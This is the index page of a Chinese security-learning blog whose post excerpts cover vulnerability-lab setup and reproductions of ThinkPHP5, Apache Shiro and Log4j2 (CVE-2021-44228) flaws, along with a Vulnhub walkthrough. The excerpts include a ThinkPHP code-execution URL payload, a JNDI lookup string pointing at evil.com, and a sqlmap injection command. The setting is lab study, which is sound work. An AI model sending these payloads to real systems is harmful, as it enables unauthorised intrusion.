avatar
文章
128
标签
47
分类
8
主页
全部文章
标签
分类
链接
关于
Putdownd’s Blog
主页
全部文章
标签
分类
链接
关于

Putdownd’s Blog

vulfocus搭建第二种方案-镜像下载问题
发表于2023-02-13|运维开发
搭建问题 上一篇: https://putdown.top/archives/2454ee1f.html 镜像下载的时候没有反应;下载慢等情况. 官方搭建文档: https://fofapro.github.io/vulfocus/#/INSTALL?id=docker-compose-%e5%ae%89%e8%a3%85 第二种方案 搭建开始拉取 vulfocus 和安装项目依赖123在盘符新建文件夹 datacd /datagit clone https://github.com/fofapro/vulfocus.git web 配置环境参数12cd /data/webvim docker-compose.yaml 修改文件 下面还有一处, xxx.xxx.xxx.xxx ,忘记修改了,自行修改下 启动项目1docker-compose up 这时浏览器地址栏输入本机ip即可访问vulfocus服务 预览 镜像问题 靶场镜像下载1https://hub.docker.com/u/vulfocus 例子 1docker pull vu...
漏洞复现-骑士cms任意代码执行(CVE-2020-35339)
发表于2023-02-09|Web安全
环境 先扫一下后台 123http://192.168.169.233:26889/index.php?m=Admin&c=index&a=login根据靶场提示 账号密码都是 adminadmin 漏洞点
资产灯塔系统ARL
发表于2023-02-07|渗透测试
环境 docker 环境安装 本人docker版本 : docker desktop (windows版docker) 1https://www.docker.com/ ARL 1https://github.com/TophantTechnology/ARL 安装 docker安装包下载后,直接安装即可 开始安装arl 跟平时安装软件差不多,选择一个盘符 拉取镜像 1docker pull tophant/arl arl 下载 1git clone https://github.com/TophantTechnology/ARL 进入arl的docker文件夹 1cd ARL/docker/ 启动 1docker-compose up -d 网页 12账号 admin密码 arlpass 更新一下poc信息
漏洞复现-ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
发表于2023-02-07|Web安全
环境: vulhubThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 参考链接: http://www.thinkphp.cn/topic/60400.html http://www.thinkphp.cn/topic/60390.html https://xz.aliyun.com/t/3570 漏洞环境运行ThinkPHP 5.0.20版本: 环境启动 网页 复现123http://your-ip:8080/index.php?s=/Index/ hink\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1即可执行phpinfo: 漏洞成功利用 1http://192.168.169.233:8080/index.php?s=/Ind...
漏洞复现-Apache Shiro 认证绕过漏洞(CVE-2020-1957)
发表于2023-02-06|Web安全
环境: vulhubApache Shiro 认证绕过漏洞(CVE-2020-1957)Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造..;这样的跳转,可以绕过Shiro中对目录的权限限制。 参考链接: https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139 https://xz.aliyun.com/t/8281 https://blog.spoock.com/2020/05/09/cve-2020-1957/ 环境搭建执行如下命令启动一个搭载Spring 2.2.2与Shiro 1.5.1的应用: 1docker-compose up -d 环境启动后,访问http://your-ip:8080即可查...
漏洞复现-Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
发表于2023-02-06|Web安全
环境搭建: vulhubApache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)中文版本(Chinese version) Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考链接: https://logging.apache.org/log4j/2.x/security.html https://www.lunasec.io/docs/blog/log4j-zero-day/ https://xz.aliyun.com/t/10649 漏洞环境Apache Log4j2 不是一个特定的Web服务,而仅仅是一个第三方库,我们可以通过找到一些使用了这个库的应用来复现这个漏洞,比如Apache Solr。 执行如下命令启动一个Apache Solr 8.11.0,其依赖了Log4j 2.14.1: 1d...
漏洞复现-环境搭建
发表于2023-02-03|运维开发
vulhub1https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 主要在docker环境搭建 漏洞类型展示 vulfocus在线版1https://vulfocus.cn/ docker搭建一、启动docker1systemctl start docker 二、拉取vulfocus镜像1docker pull vulfocus/vulfocus:latest 三、运行vulfocus1docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.169.330 vulfo 四、用户名admin 密码admin 进入 五、在镜像管理中管理自己的漏洞镜像
vulnhub-Clover
发表于2023-02-03|Vulnhub靶机
描述 信息收集存活 12靶机 192.168.169.230kali 192.168.169.220 靶机扫描 端口12345678PORT STATE SERVICE20/tcp closed ftp-data21/tcp open ftp22/tcp open ssh80/tcp open http110/tcp closed pop3443/tcp closed https8080/tcp closed http-proxy 访问​ ...
Vulnhub-VulnCMS
发表于2022-12-19|Vulnhub靶机
存活 12kali 192.168.169.220 靶机 192.168.169.230 靶机扫描 122 80 5000 8081 9001 访问80 5000 8081 9001 12三个端口都是cms系统5000(Wordpress)、8081(Joomla)、和 9001(Drupal 7) 漏洞利用80 首先扫一下目录 文件目录 1发现两个疑似用户名:Mobley 和 Elloit,并且说了暴力破解没什么用。 5000 (Wordpress) 直接上wpscan扫描 1wpscan --url http://192.168.169.230:5000/ -e u,p 没什么有用的价值 8081 (Joomla) 使用Joomscan扫一下 1joomscan -u http://192.168.169.230:8081/ 有个sql注入 开始注入1sqlmap -u "http://192.168.169.230:8081//index.php?option=com_contenthistory&v...
linux提权辅助工具
发表于2022-12-15|渗透测试
linpeas.sh项目地址1https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS 下载地址1https://github.com/carlospolop/PEASS-ng/releases/tag/20221211 LinEnum.sh项目地址1https://github.com/rebootuser/LinEnum linprivchecker.py项目地址1https://github.com/bdamele/miscellaneous linux-exploit-suggester-2.pl1https://github.com/jondonas/linux-exploit-suggester-2 linux-exploitsuggester.sh1https://github.com/mzet-/linux-exploit-suggester
1…456…13
avatar
putdown
Welcome to lie down
文章
128
标签
47
分类
8
我的网站列表
公告
网站的目的仅限用于分享和学习! 如果有错误的地方请多多批评指正,我会第一时间进行修改。
最新文章
逆向python打包exe程序获取源代码2025-08-20
pycdc在windows下编译2025-08-19
镜像运行(vmdk在vmware运行)2025-08-19
镜像恢复记录2025-08-18
若依漏洞环境搭建(4.5版本)2025-02-25
分类
  • Kubernetes安全15
  • Vulnhub靶机30
  • Web安全30
  • 云安全2
  • 博客相关4
  • 护网/CTF3
  • 渗透测试25
  • 运维开发15
标签
XSS-labs 默认密码 操作系统&数据库 信息收集 文件包含 搜索 nmap 云原生 重要端口 DVWA 文件上传 sql-labs PostgreSQL http SqlServer upload-labs 编辑器 护网 环境搭建 Windows OWASP 术语 Burp Suite python Docker sqlmap MySQL 逆向 暴力破解 云安全 XSS hexo 漏洞复现 Linux 命令注入 Kubernetes Goat metasploit Oracle CSRF 代理
归档
  • 八月 2025 4
  • 二月 2025 2
  • 十二月 2024 2
  • 十月 2024 1
  • 五月 2024 1
  • 一月 2024 4
  • 十一月 2023 2
  • 十月 2023 19
网站信息
文章数目 :
128
本站访客数 :
本站总浏览量 :
最后更新时间 :
© 2020 - 2026 By putdown
Welcome to lie down